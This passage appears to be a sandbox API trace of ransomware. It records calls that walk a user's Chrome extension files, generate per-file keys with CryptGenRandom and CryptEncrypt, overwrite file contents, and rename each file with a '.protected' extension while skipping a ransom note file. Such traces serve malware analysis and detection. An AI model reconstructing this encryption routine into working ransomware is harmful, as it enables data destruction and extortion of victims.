(lpFirst="main.html", lpSrch=".protected") returned 0x0 [0078.586] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0078.586] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.586] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.586] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0078.587] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html") returned 139 [0078.587] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0078.587] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.588] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.588] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0078.588] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.589] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.589] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.589] CloseHandle (hObject=0x160) returned 1 [0078.589] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected") returned 149 [0078.589] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.html.protected")) returned 1 [0078.589] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.589] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0078.589] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0078.590] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0078.590] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.590] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0078.590] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0078.590] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.590] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0078.591] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js") returned 137 [0078.591] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0078.591] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0078.592] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0078.592] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.592] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.592] CloseHandle (hObject=0x160) returned 1 [0078.592] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected") returned 147 [0078.593] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\main.js.protected")) returned 1 [0078.593] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0078.593] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0078.593] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.593] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0078.593] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.593] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0078.593] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0078.594] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0078.594] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json") returned 143 [0078.594] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0078.594] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.596] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d5, lpOverlapped=0x0) returned 1 [0078.596] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0078.596] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0078.596] CloseHandle (hObject=0x160) returned 1 [0078.596] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected") returned 153 [0078.596] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\manifest.json.protected")) returned 1 [0078.597] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0078.597] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0078.597] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales") returned 138 [0078.597] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0078.597] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0078.597] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*") returned 140 [0078.597] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0078.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.599] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.599] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.599] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\.") returned 140 [0078.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.599] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.600] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.600] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.600] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\..") returned 141 [0078.600] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.600] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.600] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="$Recycle.bin") returned 1 [0078.600] lstrcmpiW (lpString1="ar", lpString2="System Volume Information") returned -1 [0078.600] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar") returned 141 [0078.600] lstrcmpW (lpString1="ar", lpString2=".") returned 1 [0078.600] lstrcmpW (lpString1="ar", lpString2="..") returned 1 [0078.600] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*") returned 143 [0078.600] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.601] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\.") returned 143 [0078.601] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\..") returned 144 [0078.601] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.601] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.601] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.601] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.601] wnsprintfW (in: pszDest=0xd020e8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.601] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.601] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.601] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.601] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.602] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.602] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0078.602] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.602] ReadFile (in: hFile=0x168, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0078.603] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295d914*=0x101, lpOverlapped=0x0) returned 1 [0078.603] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.603] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.604] CloseHandle (hObject=0x168) returned 1 [0078.604] wnsprintfW (in: pszDest=0xd13138, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected") returned 165 [0078.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js 